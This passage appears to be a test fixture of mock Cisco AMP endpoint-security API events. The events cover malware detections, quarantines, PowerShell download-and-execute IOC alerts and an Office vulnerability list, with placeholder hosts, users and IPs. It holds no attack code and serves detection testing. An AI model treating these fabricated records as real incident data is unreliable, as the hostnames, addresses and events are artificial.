IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610603346,"start_date":"2021-01-14T05:49:06+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"},"parent":{"disposition":"Clean","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515350231459808800,"timestamp":1610584664,"timestamp_nanoseconds":0,"date":"2021-01-14T00:37:44+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610584030,"timestamp_nanoseconds":579890366,"date":"2021-01-14T00:27:10+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583671182384431000,"timestamp":1610582528,"timestamp_nanoseconds":614000000,"date":"2021-01-14T00:02:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":695000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":691000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":684000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":682000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960","sha1":"5faebef3bb880489195e80e6656ccf442ff7123b","md5":"84b6f7be5370c1998886214790c6892b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15152998206589,"timestamp":1610534253,"timestamp_nanoseconds":0,"date":"2021-01-13T10:37:33+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610534253,"start_date":"2021-01-13T10:37:33+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"WINWORD.EXE","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"},"parent":{"disposition":"Clean","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2013","cve":"CVE-2014-0260","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260"},{"cve":"CVE-2014-1761","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761"},{"cve":"CVE-2014-6357","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357"},{"cve":"CVE-2015-0085","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085"},{"cve":"CVE-2015-0086","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086"},{"cve":"CVE-2015-1641","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641"},{"cve":"CVE-2015-1650","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650"},{"cve":"CVE-2015-1682","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682"},{"cve":"CVE-2015-2379","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379"},{"cve":"CVE-2015-2380","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380"},{"cve":"CVE-2015-2424","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424"},{"cve":"CVE-2016-0127","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127"},{"cve":"CVE-2016-7193","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193"},{"cve":"CVE-2017-0292","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292"},{"cve":"CVE-2017-11826","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508159571352093000,"timestamp":1610533415,"timestamp_nanoseconds":349000000,"date":"2021-01-13T10:23:35+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298360312529000,"timestamp":1610532793,"timestamp_nanoseconds":312509000,"date":"2021-01-13T10:13:13+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610532793,"start_date":"2021-01-13T10:13:13+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298355162029000,"timestamp":1610532788,"timestamp_nanoseconds":162019000,"date":"2021-01-13T10:13:08+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610532788,"start_date":"2021-01-13T10:13:08+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508153524038140000,"timestamp":1610532007,"timestamp_nanoseconds":606000000,"date":"2021-01-13T10:00:07+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6508153524038139905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521062325693667300,"timestamp":1610447087,"timestamp_nanoseconds":693632000,"date":"2021-01-12T10:24:47+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610447087,"start_date":"2021-01-12T10:24:47+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6532910514396201000,"timestamp":1610446522,"timestamp_nanoseconds":872000000,"date":"2021-01-12T10:15:22+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:Malwaregen.21do.1201","detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"OLD.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\OLD.exe","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9","sha1":"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c","md5":"cfdd16225e67471f5ef54cab9b3a5558"},"parent":{"process_id":2632,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef","sha1":"84123a3decdaa217e3588a1de59fe6cee1998004","md5":"38ae1b3c38faef56fe4907922f0385ba"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Auto.F2863A.211556.in02","detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"twhy.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Roaming\\twhy.exe","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117","sha1":"7d9518ea3f98d037745352b23861fab05d3777dc","md5":"c624d61b8f076c3ef05f74eeb96c8954"},"parent":{"process_id":4868,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132516139000,"timestamp":1608874241,"timestamp_nanoseconds":516130000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132474871000,"timestamp":1608874241,"timestamp_nanoseconds":474861000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384389977,"timestamp":1608872547,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:27+00:00","event_type":"Vulnerable Application 